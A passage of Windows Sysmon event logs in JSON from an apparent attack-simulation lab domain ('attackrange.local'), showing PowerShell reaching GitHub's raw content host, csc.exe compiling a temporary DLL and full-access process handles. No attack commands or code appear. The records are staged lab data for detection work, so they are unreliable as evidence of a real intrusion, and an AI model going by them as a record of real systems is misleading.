06:55:03.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5145,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5146,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5147,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5148,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.772\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.772","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5149,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:03.772\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001043D90600}\r\nSourceProcessId: 4776\r\nSourceThreadId: 1092\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C7-5F25-0000-001012310700}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:03.772","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001043D90600}","SourceProcessId":"4776","SourceThreadId":"1092","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C7-5F25-0000-001012310700}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5150,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:55:03.772\r\nProcessGuid: {E2A3D6B1-11C7-5F25-0000-0010882D0700}\r\nProcessId: 4228\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\c42geipp\\c42geipp.dll\r\nCreationUtcTime: 2020-08-01 06:55:03.694","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:55:03.772","ProcessGuid":"{E2A3D6B1-11C7-5F25-0000-0010882D0700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\c42geipp\\c42geipp.dll","CreationUtcTime":"2020-08-01 06:55:03.694","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5151,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:04.022\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nSourceProcessId: 2928\r\nSourceThreadId: 3400\r\nSourceImage: C:\\Windows\\sysmon64.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nTargetProcessId: 4500\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+193a0|C:\\Windows\\sysmon64.exe+5fe0|C:\\Windows\\sysmon64.exe+6177|C:\\Windows\\System32\\sechost.dll+10a75|C:\\Windows\\System32\\sechost.dll+1004d|C:\\Windows\\System32\\sechost.dll+fe55|C:\\Windows\\System32\\sechost.dll+ed3f|C:\\Windows\\sysmon64.exe+6353|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:04.022","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","SourceProcessId":"2928","SourceThreadId":"3400","SourceImage":"C:\\Windows\\sysmon64.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","TargetProcessId":"4500","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ntdll.dll+6c08a|C:\\Windows\\System32\\KERNEL32.DLL+1cff8|C:\\Windows\\System32\\KERNEL32.DLL+25a87|C:\\Windows\\sysmon64.exe+15618|C:\\Windows\\sysmon64.exe+16062|C:\\Windows\\sysmon64.exe+16487|C:\\Windows\\sysmon64.exe+193a0|C:\\Windows\\sysmon64.exe+5fe0|C:\\Windows\\sysmon64.exe+6177|C:\\Windows\\System32\\sechost.dll+10a75|C:\\Windows\\System32\\sechost.dll+1004d|C:\\Windows\\System32\\sechost.dll+fe55|C:\\Windows\\System32\\sechost.dll+ed3f|C:\\Windows\\sysmon64.exe+6353|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":5152,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.316\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nQueryName: raw.githubusercontent.com\r\nQueryStatus: 0\r\nQueryResults: type:  5 github.map.fastly.net;::ffff:199.232.64.133;\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.316","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","QueryName":"raw.githubusercontent.com","QueryStatus":"0","QueryResults":"type:  5 github.map.fastly.net;::ffff:199.232.64.133;","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5153,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:02.401\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52651\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 140.82.113.4\r\nDestinationHostname: lb-140-82-113-4-iad.github.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:02.401","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52651","DestinationIsIpv6":"false","DestinationIp":"140.82.113.4","DestinationHostname":"lb-140-82-113-4-iad.github.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:04","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":3,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":3,"OpcodeValue":0,"RecordNumber":5154,"ProcessID":2928,"ThreadID":3388,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Network connection detected:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:02.552\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-00102C020700}\r\nProcessId: 4500\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nUser: ATTACKRANGE\\Administrator\r\nProtocol: tcp\r\nInitiated: true\r\nSourceIsIpv6: false\r\nSourceIp: 10.0.1.14\r\nSourceHostname: win-dc-8400769.attackrange.local\r\nSourcePort: 52652\r\nSourcePortName: \r\nDestinationIsIpv6: false\r\nDestinationIp: 140.82.113.10\r\nDestinationHostname: lb-140-82-113-10-iad.github.com\r\nDestinationPort: 443\r\nDestinationPortName: https","Category":"Network connection detected (rule: NetworkConnect)","Opcode":"Info","UtcTime":"2020-08-01 06:55:02.552","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-00102C020700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"ATTACKRANGE\\Administrator","Protocol":"tcp","Initiated":"true","SourceIsIpv6":"false","SourceIp":"10.0.1.14","SourceHostname":"win-dc-8400769.attackrange.local","SourcePort":"52652","DestinationIsIpv6":"false","DestinationIp":"140.82.113.10","DestinationHostname":"lb-140-82-113-10-iad.github.com","DestinationPort":"443","DestinationPortName":"https","EventReceivedTime":"2020-08-01 06:55:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
